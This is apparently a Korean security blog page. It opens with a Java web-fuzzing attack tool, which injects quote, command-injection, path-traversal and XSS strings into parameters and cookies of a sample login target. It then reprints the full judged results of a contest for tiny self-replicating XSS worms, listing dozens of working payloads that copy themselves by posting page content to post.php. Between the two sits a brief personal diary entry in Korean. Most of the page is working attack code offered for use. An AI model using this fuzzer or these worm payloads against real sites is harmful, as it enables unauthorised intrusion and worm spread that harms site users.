// JAttack.java
// by Dafydd Stuttard
import java.net.*;
import java.io.*;
class Param
{
String name, value;
Type type;
boolean attack;
Param(String name, String value, Type type, boolean attack)
{
this.name = name;
this.value = value;
this.type = type;
this.attack = attack;
}
enum Type
{
URL, COOKIE, BODY
}
}
interface PayloadSource
{
boolean nextPayload();
void reset();
String getPayload();
}
class PSNumbers implements PayloadSource
{
int from, to, step, current;
PSNumbers(int from, int to, int step)
{
this.from = from;
this.to = to;
this.step = step;
reset();
}
public boolean nextPayload()
{
current += step;
return current <= to;
}
public void reset()
{
current = from - step;
}
public String getPayload()
{
return Integer.toString(current);
}
}
class PSFuzzStrings implements PayloadSource
{
static final String[] fuzzStrings = new String[]
{
"'", ";/bin/ls", "../../../../../../etc/passwd", "xsstest"
};
int current = -1;
public boolean nextPayload()
{
current++;
return current < fuzzStrings.length;
}
public void reset()
{
current = -1;
}
public String getPayload()
{
return fuzzStrings[current];
}
}
class JAttack
{
// attack config
String host = "wahh-app.com";
int port = 82;
String method = "GET";
String url = "/app/acc/login.jsp";
Param[] params = new Param[]
{
new Param("ts", "29813", Param.Type.URL, true),
new Param("_DARGS",
"/app/acc/login_assumed.jsp", Param.Type.URL, true),
new Param("webabacus_id", "131st22418177-1", Param.Type.COOKIE, true),
new Param("DYN_USER_ID", "100014981", Param.Type.COOKIE, true),
new Param("USER_CONFIRM", "836de5f76c5ec83", Param.Type.COOKIE, true),
new Param("ParkoSearch2007", "true", Param.Type.COOKIE, true),
new Param("JSESSIONID", "DKBHCAOQQWHFFCKTR", Param.Type.COOKIE, true),
new Param("_dyncharset", "UTF-8", Param.Type.URL, true),
new Param("_template", "app/inc/templ.jsp", Param.Type.URL, true),
new Param("personalDetailsURL",
"..%2Facc%2Fregister_p1.jsp", Param.Type.URL, true),
new Param("login", "user@wahh-mail.com", Param.Type.URL, true),
new Param("originalRedirectFromURL", "+", Param.Type.URL, true),
new Param("password", "bestinfw", Param.Type.URL, true),
};
// PayloadSource payloads = new PSNumbers(3000, 3010, 1);
PayloadSource payloads = new PSFuzzStrings();
static final String[] grepStrings = new String[]
{
"error", "exception", "illegal", "invalid", "not found", "xsstest"
};
static final String[] extractStrings = new String[]
{
"<td>Name:</td><td>", "<td>Address:</td><td>"
};
// attack state
int currentParam = 0;
boolean nextRequest()
{
if (currentParam >= params.length)
return false;
if (!params[currentParam].attack)
{
currentParam++;
return nextRequest();
}
if (!payloads.nextPayload())
{
payloads.reset();
currentParam++;
return nextRequest();
}
return true;
}
String buildRequest()
{
// build parameters
StringBuffer urlParams = new StringBuffer();
StringBuffer cookieParams = new StringBuffer();
StringBuffer bodyParams = new StringBuffer();
for (int i = 0; i < params.length; i++)
{
String value = (i == currentParam) ?
payloads.getPayload() :
params[i].value;
if (params[i].type == Param.Type.URL)
urlParams.append(params[i].name + "=" + value + "&");
if (params[i].type == Param.Type.COOKIE)
cookieParams.append(params[i].name + "=" + value + "; ");
if (params[i].type == Param.Type.BODY)
bodyParams.append(params[i].name + "=" + value + "&");
}
// build request
StringBuffer req = new StringBuffer();
req.append(method + " " + url);
if (urlParams.length() > 0)
req.append("?" + urlParams.substring(0, urlParams.length() - 1));
req.append(" HTTP/1.0\r\nHost: " + host);
if (cookieParams.length() > 0)
req.append("\r\nCookie: " + cookieParams.toString());
if (bodyParams.length() > 0)
{
req.append("\r\nContent-Type: application/x-www-form-urlencoded");
req.append("\r\nContent-Length: " + (bodyParams.length() - 1));
req.append("\r\n\r\n");
req.append(bodyParams.substring(0, bodyParams.length() - 1));
}
else req.append("\r\n\r\n");
return req.toString();
}
String issueRequest(String req) throws UnknownHostException, IOException
{
Socket socket = new Socket(host, port);
OutputStream os = socket.getOutputStream();
os.write(req.getBytes());
os.flush();
BufferedReader br = new BufferedReader(new InputStreamReader(
socket.getInputStream()));
StringBuffer response = new StringBuffer();
String line;
while (null != (line = br.readLine()))
response.append(line);
os.close();
br.close();
return response.toString();
}
String parseResponse(String response)
{
StringBuffer output = new StringBuffer();
output.append(response.split("\\s+", 3)[1] + "\t");
output.append(Integer.toString(response.length()) + "\t");
for (String grep : grepStrings)
if (response.indexOf(grep) != -1)
output.append(grep + "\t");
for (String extract : extractStrings)
{
int from = response.indexOf(extract);
if (from == -1)
continue;
from += extract.length();
int to = response.indexOf("<", from);
if (to == -1)
to = response.length();
output.append(response.subSequence(from, to) + "\t");
}
return output.toString();
}
void doAttack()
{
System.out.println("param\tpayload\tstatus\tlength");
String output = null;
while (nextRequest())
{
try
{
output = parseResponse(issueRequest(buildRequest()));
}
catch (Exception e)
{
output = e.toString();
}
System.out.println(params[currentParam].name + "\t" +
payloads.getPayload() + "\t" + output);
}
}
public static void main(String[] args)
{
new JAttack().doAttack();
}
}
'분류 전체보기'에 해당되는 글 239건
- 2009.04.15 jattack.java
- 2009.04.15 주소창 숨기기 - to sokim
- 2009.04.13 유니코드
- 2009.04.13 arp spoofing + script 삽입
- 2009.04.13 Day - 090412
- 2009.04.11 Diminutive XSS Worm Replication Contest
- 2009.04.10 SQL 서버 이름 변경하기
- 2009.04.10 메일서버 관련 로그 확인 + 최대 발송자 수 변경 + 재전송 시도
- 2009.04.08 메일서버 백업 스크립트
- 2009.04.04 오픈웹의 ActiveX 논쟁
나이와 인생의 속도는 비례한다고 하던데 요즘 참시간이 빨리 지나간다.
주워들은 이야기로는 주변자극에 민감해 져서 어릴적보다 시간이 빨리 간다고 한다.
요즘 많이 둔해 진걸까? 작은 것에 기뻐하고 감사하는 마음은 많이 줄어 든것도 같다.
주말에도 공부했던게 오래된것 같고... 스터디도 지쳐가는거 같고... 다시 도약을 해야 할건데...
열정이 예전만 못하는거 같다. 자신이 할 수 있는만큼 최선을 다해야 한다는 생각이 점점 현실과 타협을 해 가는 듯하다.
또 한주가 시작된다. 시간은 또 금방흘러 갈것이며, 또 동일한 후회를 하며 이런 글을 적지 않아야 될것인데...
아름다운 사람이 되자.
<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">
and
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">
Both were a stunningly small 161 bytes! Congrats to both of the guys and a huge round of applause to everyone who submitted results. I was completely shocked by the results, as I thought we'd land at a much smaller number, but I think that was muddied by the fact that many people couldn't test their code in IE7.0.
And for those who want to see how the rest of the results panned out here are the judge results (feel free to contest them - it was a ton of work going through them so I _may_ have made errors):
spyware - 136 Doesn't work in Firefox 2.0.0.11
ý<form onFocus="submit(alert('xss'))"><input onFocus="id=content,value=document.body.match(/ý.ó/)"><iframe onLoad="parentNode.focus()">ó
gareth - 162 Doesn't work in Firefox 2.0.0.11
<iframe onload="c=['content=','<iframe onload=\42',attributes[0].nodeValue,'\42>'].join('');with(new XMLHttpRequest)open('POST','post.php'),send(c);alert('XSS')">
digi7al64 (via gareth) - 144 Doesn't work in Firefox 2.0.0.11
,<b><img src=""onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>
doctordan - 154 Doesn't work in Firefox 2.0.0.11
„<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=',parentNode.innerHTML.match(/„.+\v/))),alert('XSS')">0x0B
sdc - 160 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',submit(i[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">
ma1 - 165 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">
.mario -154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"
Ronald - 147 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">
sdc - 149 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">
Gareth - 148 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">;
Ronald - 198 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
Ronald - 152 Works in FF with no growth but doesn't work in IE7.0
<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">
sdc - 142 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('<content>'+parentNode.innerHTML.bold(alert('xss')+'</content>')"></b>
ma1 - 201 Doesn't work in Firefox 2.0.0.11 on second iteration)
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),198))"
gareth - 209 Works in FF with no growth but doesn't work in IE7.0
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">
Ronald - 203 Works on FF and IE!!! (does change order around, but no growth):
<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
Turns into (also 203 chars):
<B><IMG onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))" src=""></B>
ma1 - 132 Doesn't work in Firefox 2.0.0.11 as written
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),129))"
ma1 - 140 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),137)))"
ma1 - 209 Works in FF with no growth but doesn't work in IE7.0
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"
gareth - 188 Works in FF with no growth but doesn't work in IE7.0
<img src="" onerror="appendChild(cloneNode(0));i=innerHTML;with(appendChild(createElement('form')))submit(alert('XSS'),innerHTML='<textarea name=content>'+i,action=(method='post')+'.php')">
gareth - 209 Doesn't work in Firefox 2.0.0.11
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">
matt presson (via gareth) - 140 Doesn't work in Firefox 2.0.0.11
<img src="" onerror="alert('xss');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send('content='+i)">
gareth - 128 Missing payload
<img src="" onerror="appendChild(cloneNode(0));i=innerHTML,h=new XMLHttpRequest;h.open('POST','post.php');h.send('content='+i)">
digi7al64 - 140 Doesn't work in Firefox 2.0.0.11
<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>
glacialphoenix (via digi7al64) - 226 Doesn't work in Firefox 2.0.0.11
<p/id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('Content-type','application/x-www-form-urlencoded'),send('content=<p/id=_>'+_.innerHTML.replace(/\+/g,"%2B")+'</p>')</script></p>
doctordan - 133 Invalid as parens may exist elsewhere on the page
{<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+\v/)),alert('XSS')">0x0B
digi7al64 - 133 Doesn't work in Firefox 2.0.0.11
<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'</p>')</script></p>
digi7al64 - 134 IE only
<form id=_ method=post action=post.php><input name='content'><iframe onload=with(_)alert('XSS',submit(_[0].value=_.outerHTML))></form>
digi7al64 - 111 IE only
<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>
badsamaritan - 168 Works in FF but grows
<form method=post action=post.php><input name=content><input type=image onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>
gareth - 146 Works in FF but grows
<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))"
gareth - 153 Works in FF with no growth but doesn't work in IE7.0
<form><img src="" onerror="(f=parentNode)[0].value='<form>'+f.innerHTML;with(f)submit(alert('XSS',action=(method='post')+'.php'))"><input name="content">
ronald - 152 Works in FF with no growth but doesn't work in IE7.0
<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">
gareth - 204 Works in FF with no growth but doesn't work in IE7.0
_<script>c=(d=document).body.innerHTML.match(/_<.*/)+'\n';with(d.body.appendChild(d.createElement('form')))submit(alert('XSS',innerHTML='<textarea name=content>'+c,action=(method='post')+'.php'))</script>
ronald - 134 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
gareth - 160 Works in FF with no growth but doesn't work in IE7.0
<form><input onerror="i=this;with(form)submit(alert('XSS',i.value='<form>'+innerHTML,i.type=action=(method='post')+'.php'))" name="content" src="" type="image">
doctordan - 139 Invalid as parens may exist elsewhere on the page
{<img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+?\d/)),alert('XSS')">9
doctordan (via gareth) - 138 Doesn't work in Firefox 2.0.0.11
_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/_<.+/))">
gareth - 142 Doesn't work in Firefox 2.0.0.11
_<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+document.body.innerHTML.match(/_<*.+/))">
doctordan (via ronald) - 130 Doesn't work in Firefox 2.0.0.11
<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"src=></b
doctordan (via ronald) - 134 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
matt presson (via backstorm/ronald) - 125 Doesn't work in Firefox 2.0.0.11
<b><a onblur="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('xss')))"></b>
backstorm - 125 Doesn't work in Firefox 2.0.0.11
<b><i onload="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"/></b>
matt presson (via backstorm) - 125 Doesn't work in Firefox 2.0.0.11
<b><a onblur="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>
ronald - 131 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>
sdc - 154 (via ma1/.mario) Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"
.mario (via ma1) - 154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"
ma1 - 155 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">
.mario - 129 Doesn't work in Firefox 2.0.0.11
<b><iframe/onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
.mario - 134 Doesn't work in Firefox 2.0.0.11
<b><img/onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"/src=""></b>
ronald - 130 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>
ronald - 135 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>
ronald (via gareth) - 138 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></iframe></b>
bwb labs - 251 - Works in FF and IE!!!
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
bwb labs - 254 Grows
<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>
matt presson - 128 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold)"></b>
gareth - 156 Doesn't work in Firefox 2.0.0.11
<x><script>alert('XSS');with(new XMLHttpRequest)open(x='post',x+'.php'),send('content='+document.body.parentNode.innerHTML.match(/<x>.*<\/x>/))</script></x>
ronald - 129 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>
spyware - 173 Doesn't work in Firefox 2.0.0.11
<form id=a></HEAD><BODY><INPUT id=x name=content><IFRAME onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></IFRAME></BODY>
spyware - 157 Doesn't work in Firefox 2.0.0.11
<form id=a><input id="x" name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></iframe>
spyware - 146 Doesn't work in Firefox 2.0.0.11
<form id=a><input id=x name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))">
gareth - 206 Doesn't work in Firefox 2.0.0.11
<script x="">alert('XSS');with(document)c=body.parentNode.innerHTML.match(/<script x([\n]|.){197}/)[0],body.innerHTML='<form action=post.php method=post><textarea name=content>'+c,forms[0].submit()</script>
ronald - 136 Breaks DOM knowledge rule
<form><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content=<form>'+document.forms[0].innerHTML)">
beni (via ronald) - 131 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+parentNode.innerHTML.bold())"></b>
ronald - 111 Doesn't work in Firefox 2.0.0.11 and grows
<iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+body.innerHTML)">
ronald - 174 Grows
<iframe src=. onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.setRequestHeader('content-type','multipart/form-data');r.send('content='+body.innerHTML)">
gareth - 192 Uses the onload event handler which may already be assigned
<body onload="alert('XSS');with(d=document)body.innerHTML='<form><textarea name=content>'+body.parentNode.innerHTML.match(/.{21}XSS.{176}/);with(d.forms[0])submit(action=method='post'+'.php')"
mario (via beni) - 177 Works in FF but breaks in IE7.0 on second iteration
<b><form action="post.php" method="post"><input name="content"><img src="1" onerror="alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}"></form></b>
beni - 171 Works in FF but breaks in IE7.0 on second iteration
<b><form action=post.php method=post><input name=content><img src=1 onerror=alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}></form></b>
gareth - 175 Doesn't work in Firefox 2.0.0.11
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>
gareth - 153 Breaks DOM knowledge rule
<script>with(document.body)innerHTML='<form action=post.php method=post><textarea name=content>'+parentNode.innerHTML;document.forms[0].submit()</script>
gareth - 147 Breaks DOM knowledge rule
<body onload="with(document)body.innerHTML='<form action=post.php method=post><textarea name=content>'+body.parentNode.innerHTML,forms[0].submit()"
gareth - 175 Breaks DOM knowledge rule
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>
ronald - 185 Breaks DOM knowledge rule
<form name="i" id=j>
<input name='content'><script>(j)?x=j:x=document.i;x[0].value='<form name="i" id=j>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>
.mario (via ronald) - 161 Breaks DOM knowledge rule
<form name=_><input name="content"><script>x=document._;x[0].value='<form name=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>
ronald (doctype check) - 165 Breaks DOM knowledge rule
<form id=_><input name='content'><script>(_)?x=_:x=document.i;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>
ronald (via kyran) - 185 Doesn't work in Firefox 2.0.0.11
<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};
</script>
bwb labs - 253 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>
bwb labs - 256 Doesn't work in Firefox 2.0.0.11
<img src=. alt="alert('XSS');with(new XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}" onerror=eval(alt)>
bwb labs - 255 Works in both FF and IE7.0!!!
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>
spikeman - 154 Grows
<form><input id="c" name="content"><img onerror="with(c)with(parentNode)alert('xss',submit(value='<form>'+innerHTML,action=(method='post')+'.php'))" src="
bwb labs (via dbloom) - 256 Works in FF and IE!!!
<script>eval(y="alert('XSS');q=unescape('%'+22);with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>
.mario - 158 Doesn't work in Firefox 2.0.0.11
<form name=m><input name="content"><script>with(document.m)submit(alert('XSS'),action=(method='post')+'.php',content.value='<form name=f>'+innerHTML)</script>
.mario - 159 Works in FF with no growth but doesn't work in IE7.0
<form><img onerror="with(i=parentNode)alert('XSS',submit(i[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',153)))" src="x"><input name="content"
kyran - 183 Doesn't work in Firefox 2.0.0.11
<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};</script>
sdc - 154 - Grows in FF
<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=
sdc - 154 - Grows in FF (same as above)
<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=
ma1 (via gareth) - Works in FF but grows and stops working in IE7.0
<form><input name="content" onmousemove="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),128))">
gareth - 154 Posts to the wrong page
<form><input name=content onMouseMove="eval(value)" value="alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()">
gareth - 160 Posts to the wrong page
<form><textarea name=content onMouseMove="eval(value)">alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()</textarea>
dbloom - 252 Posts to the wrong page (resides in the same directory)
<body onfocus=with(document)[c=["%3"]+"E",body.innerHTML=unescape("<form\tmethod=post\taction=/post.php"+c+"<textarea\tname=content"+c+"<body\tonfocus="+(onfocus+c).replace(/[\s\x7B\x7D\x3B]|^[^\)]*\)/g,"")+"</body"+c),forms[0].submit(),alert("xss")]>
ma1 - 157 Breaks DOM knowledge rule
<form name=f><input name="content"><script>with(_=document.f)submit(_[0].value='<form name=f>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>
doctordan - 158 Doesn't work in Firefox 2.0.0.11
<form name=r><input name="content"><script>with(document.r)submit(content.value='<form name=r>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>
spyware - 141 Doesn't work in Firefox 2.0.0.11 if body content is present - so close!
ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/ý.ú/);" type="submit">ú</form>
ma1 - 142 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>with(_)_[0].value='<form id=_>'+innerHTML,action=(method='post')+'.php',submit(alert('XSS'))</script>
ronald - 143 Doesn't work in Firefox 2.0.0.11
<form id=_><input name='content'><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>
sdc (via ronald) 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>undefined
sdc (via gareth) 169 Doesn't work in Firefox 2.0.0.11
<form><input type="image" name="content" onerror="alert('XSS');with(p=parentNode)action=(method='post')+'.php',value='<form>'+p.innerHTML;type='text';p.submit()" src="">
gareth - 164 Posts to the wrong page
<form><input type=image name=content onerror="alert('XSS');with(p=parentNode)action=(method='post')+'8.php',value='<form>'+p.innerHTML;type='text';p.submit()" src>
sdc - 160 Works in FF with no growth but doesn't work in IE7.0
<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">
.mario - 132 Doesn't work in Firefox 2.0.0.11
<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=method='post',i.value='<form>'+innerHTML)</script>
.mario - 141 Doesn't work in Firefox 2.0.0.11
<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>
ronald - 132 Doesn't work in Firefox 2.0.0.11
<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/./);submit();"></form>
spyware - 129 Doesn't work in Firefox 2.0.0.11
ý<FORM action=post.php method=post><INPUT onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();" name=content></FORM>
spyware - 135 Doesn't work in Firefox 2.0.0.11
ý<form action="post.php" method="post"><input name="content" onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();"></form>
mario (via ronald) - 142 Doesn't work in Firefox 2.0.0.11
<form id=m><input name="content"><script>with(m)m[0].value='<form id=m>'+innerHTML,submit(action=(method='post')+'.php'),alert('XSS')</script>
ronald - 141 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>
ronald - 145 Doesn't work in Firefox 2.0.0.11
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>
ronald - 147 Doesn't work in Firefox 2.0.0.11
<form id=_><input name=content><script>_.content.value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>
spikeman (via .mario) - 132 Requires user interaction
<form id=i><button onclick="i.action=(i.method='post')+'.php';value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>
.mario - 140 Requires user interaction
<form id=j><button onclick="j.action=j.method='post';value='<form id=j>'+j.innerHTML+'</form>';alert('XSS')" name="content"></button></form>
.mario - 136 Requires user interaction
<form><button onclick="with(parentNode)action=(method='post')+'.php',value='<form>'+innerHTML.slice(alert('XSS'),129)" name="content">
.mario - 125 Requires user interaction
<form id=i><button onclick="i.method=i.action='post',value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>
.mario (via all) - 125 Requires user interaction
<form><input name="content" onblur="submit(action=method='post',value='<form>'+form.innerHTML.slice(alert('xss'),119))">
.mario - 126 Requires user interaction
